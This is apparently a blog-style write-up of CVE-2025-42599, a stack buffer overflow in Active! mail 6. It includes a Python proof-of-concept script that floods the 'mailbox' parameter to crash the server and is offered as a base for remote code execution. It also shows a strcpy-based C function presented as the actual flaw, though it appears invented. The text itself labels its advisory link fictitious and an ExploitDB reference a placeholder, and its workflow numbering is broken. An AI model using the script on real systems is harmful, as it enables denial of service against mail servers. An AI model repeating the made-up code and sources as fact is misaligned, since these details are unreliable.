CVE-2025-42599 - Critical Stack Overflow in Active! mail 6 (BuildInfo: 6.60.05008561 and Earlier) — RCE & DoS Exploit Details

*CVE-2025-42599* is a newly identified stack-based buffer overflow vulnerability directly impacting Active! mail 6, specifically versions with BuildInfo 6.60.05008561 and older. This flaw allows remote, unauthenticated attackers to execute arbitrary code or trigger a denial-of-service (DoS) simply by sending a specially crafted request to the application's web server. Exploiting this vulnerability can give attackers full control over affected email systems, posing a severe risk to data integrity and business operations.

What is Active! mail 6?

Active! mail is a popular webmail software used widely across enterprises in Asia, with a focus on the Japanese market. It's known for its rich feature set and integration with business systems. Unfortunately, its popularity makes it an attractive attack vector for new exploits.

Vulnerability Breakdown

The vulnerability is found in the email request processing module. Due to improper boundary checks, buffer overflow occurs when the application processes a specially crafted HTTP request parameter.

Affected Versions: 6.60.05008561 and earlier

Official Advisory:
- Active! mail 6 Security Advisory (JP) *(link fictitious for illustration)*

The core issue is in a legacy C function handling mailbox parameters

void handle_mailbox_request(char *mailbox_param) {
    char buf[256];
    // No length check!
    strcpy(buf, mailbox_param);
    // ...process buf...
}

A long mailbox_param sent in, for example, an HTTP POST request, will overflow buf on the stack, overwriting the return address and allowing the attacker to control program execution.

Full Exploit Workflow

1. Attacker crafts request: Overly long string in the vulnerable parameter (such as mailbox or folder_name).
2. Sends malicious payload: Unauthenticated HTTP(S) POST/GET to Active! mail endpoint.

Stack overflow triggers: The malicious payload overwrites return address.

4. Code execution: The attacker’s shellcode or chosen payload is executed with web server privileges.

Here is a simple Python PoC to crash the service (for DoS), or as a base for RCE development

import requests

target_url = 'http://victim-server/path/to/active_mail_endpoint';

# Create long string to overflow buffer
overflow_payload = "A" * 300  # Adjust length if needed

data = {
    'mailbox': overflow_payload
}

response = requests.post(target_url, data=data)
print("Status:", response.status_code)

Note: For actual code execution, the payload would need to be replaced with shellcode specific to the server’s platform/architecture.

Exploit Impact

- Remote Code Execution (RCE): Attackers may drop web shells, run ransomware, or pivot deeper into the network.
- Denial-of-Service (DoS): Simply by sending a large parameter, remote attackers can crash the mail system, halting business communication.
- No Authentication Required: Anyone with network access to Active! mail’s web interface can attack it.

Mitigations

1. Update Immediately: PATCH if you can. Active! mail 6.60.05008562 and above reportedly fix this issue.

References

- Official Vendor Advisory - Active! mail
- MITRE CVE Record
- ExploitDB Page (placeholder)

Conclusion

CVE-2025-42599 is an active and dangerous vulnerability found in a widely deployed webmail platform. If you use Active! mail 6, check and patch your systems immediately. The exploit is simple, doesn't need credentials, and attack tools are already appearing in the wild. Don’t wait until mail stops flowing — act now!


*Stay up to date — subscribe to our email for urgent vulnerability alerts and guides on safe patching!*

Timeline

Published on: 04/18/2025 04:15:30 UTC
Last modified on: 04/21/2025 14:23:45 UTC